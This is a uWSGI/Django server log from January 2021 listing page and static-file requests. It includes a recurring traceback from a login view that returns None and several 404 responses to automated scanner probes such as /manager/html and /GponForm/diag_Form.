+[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 19559] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 18965|app: 0|req: 713/967] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 06:43:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 714/968] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 07:29:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /config/getuser
+[pid: 18965|app: 0|req: 715/969] 185.132.53.63 () {36 vars in 617 bytes} [Sun Jan 10 07:57:59 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 716/970] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 08:08:02 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 717/971] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 08:53:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 718/972] 89.248.168.108 () {22 vars in 227 bytes} [Sun Jan 10 09:06:13 2021] HEAD / => generated 52529 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 719/973] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 09:37:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 720/974] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 10:17:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 721/975] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 10:58:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 722/976] 117.100.100.38 () {40 vars in 1026 bytes} [Sun Jan 10 11:23:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/977] 117.100.100.38 () {40 vars in 963 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/978] 117.100.100.38 () {40 vars in 959 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/979] 117.100.100.38 () {40 vars in 981 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/980] 117.100.100.38 () {40 vars in 961 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/981] 117.100.100.38 () {40 vars in 967 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/982] 117.100.100.38 () {40 vars in 942 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/983] 117.100.100.38 () {40 vars in 956 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/984] 117.100.100.38 () {40 vars in 958 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/985] 117.100.100.38 () {40 vars in 940 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/986] 117.100.100.38 () {40 vars in 948 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/987] 117.100.100.38 () {40 vars in 1052 bytes} [Sun Jan 10 11:23:50 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/988] 117.100.100.38 () {40 vars in 1058 bytes} [Sun Jan 10 11:23:50 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/989] 117.100.100.38 () {40 vars in 1020 bytes} [Sun Jan 10 11:23:51 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 723/990] 61.129.7.235 () {32 vars in 535 bytes} [Sun Jan 10 11:29:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/991] 61.129.7.235 () {34 vars in 672 bytes} [Sun Jan 10 11:29:29 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/992] 61.129.7.235 () {34 vars in 668 bytes} [Sun Jan 10 11:30:40 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/993] 61.129.7.235 () {34 vars in 712 bytes} [Sun Jan 10 11:31:31 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/994] 61.129.7.235 () {34 vars in 640 bytes} [Sun Jan 10 11:32:11 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/995] 61.129.7.235 () {34 vars in 632 bytes} [Sun Jan 10 11:32:52 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 724/996] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 11:36:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 725/997] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 12:20:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 726/998] 167.114.240.100 () {22 vars in 236 bytes} [Sun Jan 10 12:40:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html/
+[pid: 18965|app: 0|req: 727/999] 167.114.240.100 () {24 vars in 304 bytes} [Sun Jan 10 12:40:34 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 728/1000] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:05:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+...The work of process 18965 is done. Seeya!
+worker 1 killed successfully (pid: 18965)
+Respawned uWSGI worker 1 (new pid: 12823)
+[pid: 12823|app: 0|req: 729/1001] 177.200.16.10 () {28 vars in 403 bytes} [Sun Jan 10 13:19:47 2021] GET / => generated 6416 bytes in 177 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 730/1002] 37.46.150.7 () {22 vars in 224 bytes} [Sun Jan 10 13:22:17 2021] HEAD / => generated 52526 bytes in 88 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 731/1003] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:52:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 732/1004] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:52:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 733/1005] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 14:35:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 734/1006] 156.96.155.229 () {30 vars in 455 bytes} [Sun Jan 10 14:55:39 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 735/1007] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 16:02:57 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1008] 113.96.198.16 () {28 vars in 352 bytes} [Sun Jan 10 16:06:16 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 736/1009] 37.46.150.7 () {22 vars in 224 bytes} [Sun Jan 10 16:18:12 2021] HEAD / => generated 52526 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 737/1010] 83.97.20.34 () {26 vars in 278 bytes} [Sun Jan 10 16:20:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 738/1011] 101.251.238.50 () {32 vars in 507 bytes} [Sun Jan 10 16:23:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 739/1012] 83.97.20.21 () {26 vars in 277 bytes} [Sun Jan 10 16:43:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+invalid request block size: 26451 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 48890] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[uwsgi-http key: client_addr: 61.219.11.153 client_port: 47868] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 12823|app: 0|req: 740/1013] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:09:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 741/1014] 89.248.168.108 () {22 vars in 227 bytes} [Sun Jan 10 18:19:35 2021] HEAD / => generated 52529 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 742/1015] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:47:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 743/1016] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 18:49:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 744/1017] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 19:26:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 745/1018] 177.11.232.73 () {28 vars in 410 bytes} [Sun Jan 10 19:30:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 746/1019] 83.97.20.29 () {26 vars in 278 bytes} [Sun Jan 10 19:53:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 747/1020] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 20:07:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 748/1021] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 20:43:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 749/1022] 89.177.20.163 () {28 vars in 410 bytes} [Sun Jan 10 20:56:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 750/1023] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 21:20:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 751/1024] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 21:56:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 752/1025] 157.245.140.3 () {22 vars in 223 bytes} [Sun Jan 10 22:00:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 753/1026] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 22:36:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 754/1027] 111.229.246.132 () {22 vars in 236 bytes} [Sun Jan 10 22:38:29 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 755/1028] 111.229.246.132 () {24 vars in 302 bytes} [Sun Jan 10 22:38:29 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /config/getuser
+[pid: 12823|app: 0|req: 756/1029] 209.141.60.195 () {36 vars in 618 bytes} [Sun Jan 10 22:43:14 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 757/1030] 83.97.20.21 () {26 vars in 277 bytes} [Sun Jan 10 23:11:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 758/1031] 123.100.226.3 () {22 vars in 235 bytes} [Sun Jan 10 23:20:23 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 759/1032] 123.100.226.3 () {24 vars in 301 bytes} [Sun Jan 10 23:20:24 2021] GET /manager/html => generated 3401 bytes in 5 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 760/1033] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 23:50:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 761/1034] 91.221.7.24 () {28 vars in 408 bytes} [Mon Jan 11 00:18:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 762/1035] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 00:28:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /http:/www.qq.com/404/search_children.js
+[pid: 12823|app: 0|req: 763/1036] 106.75.211.211 () {30 vars in 492 bytes} [Mon Jan 11 00:34:08 2021] GET http://www.qq.com/404/search_children.js => generated 1727 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 764/1037] 198.143.155.122 () {30 vars in 438 bytes} [Mon Jan 11 01:02:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 765/1038] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 01:04:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 766/1039] 119.45.195.247 () {22 vars in 236 bytes} [Mon Jan 11 01:40:24 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html/
+[pid: 12823|app: 0|req: 767/1040] 119.45.195.247 () {24 vars in 304 bytes} [Mon Jan 11 01:40:24 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 768/1041] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 01:44:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 769/1042] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 02:16:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 770/1043] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 02:25:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 771/1044] 182.92.65.228 () {22 vars in 235 bytes} [Mon Jan 11 02:53:34 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 772/1045] 182.92.65.228 () {24 vars in 301 bytes} [Mon Jan 11 02:53:34 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 773/1046] 89.248.168.108 () {22 vars in 227 bytes} [Mon Jan 11 02:54:13 2021] HEAD / => generated 52529 bytes in 26 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 774/1047] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 03:02:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+invalid request block size: 23708 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 183.192.179.16 client_port: 51624] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 775/1048] 177.72.64.165 () {28 vars in 403 bytes} [Mon Jan 11 03:10:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /actuator/health
+[pid: 12823|app: 0|req: 776/1049] 192.241.214.75 () {30 vars in 373 bytes} [Mon Jan 11 03:29:09 2021] GET /actuator/health => generated 3409 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 777/1050] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 04:19:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 778/1051] 45.76.144.219 () {32 vars in 381 bytes} [Mon Jan 11 04:19:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1052] 113.96.198.50 () {28 vars in 345 bytes} [Mon Jan 11 04:53:28 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 779/1053] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 04:57:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 780/1054] 219.228.146.244 () {38 vars in 822 bytes} [Mon Jan 11 05:05:59 2021] GET /home/ => generated 8646 bytes in 105 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 781/1055] 219.228.146.244 () {40 vars in 877 bytes} [Mon Jan 11 05:06:02 2021] GET /all-0-0-0 => generated 9504 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1056] 219.228.146.244 () {40 vars in 884 bytes} [Mon Jan 11 05:06:02 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1057] 219.228.146.244 () {40 vars in 908 bytes} [Mon Jan 11 05:06:02 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 782/1058] 219.228.146.244 () {40 vars in 881 bytes} [Mon Jan 11 05:06:07 2021] GET /all-0-0-0 => generated 9504 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1059] 219.228.146.244 () {40 vars in 884 bytes} [Mon Jan 11 05:06:07 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1060] 219.228.146.244 () {40 vars in 908 bytes} [Mon Jan 11 05:06:07 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 783/1061] 219.228.146.244 () {40 vars in 873 bytes} [Mon Jan 11 05:06:11 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 784/1062] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 05:25:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 785/1063] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 05:36:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 786/1064] 59.110.158.79 () {30 vars in 413 bytes} [Mon Jan 11 05:54:30 2021] GET /manager/html => generated 3400 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 787/1065] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 06:14:42 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 788/1066] 1.34.21.161 () {36 vars in 497 bytes} [Mon Jan 11 06:39:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 789/1067] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 06:54:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 790/1068] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 07:31:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /GponForm/diag_Form
+[pid: 12823|app: 0|req: 791/1069] 49.143.32.6 () {34 vars in 438 bytes} [Mon Jan 11 07:37:46 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 792/1070] 211.99.98.229 () {22 vars in 235 bytes} [Mon Jan 11 08:00:40 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html
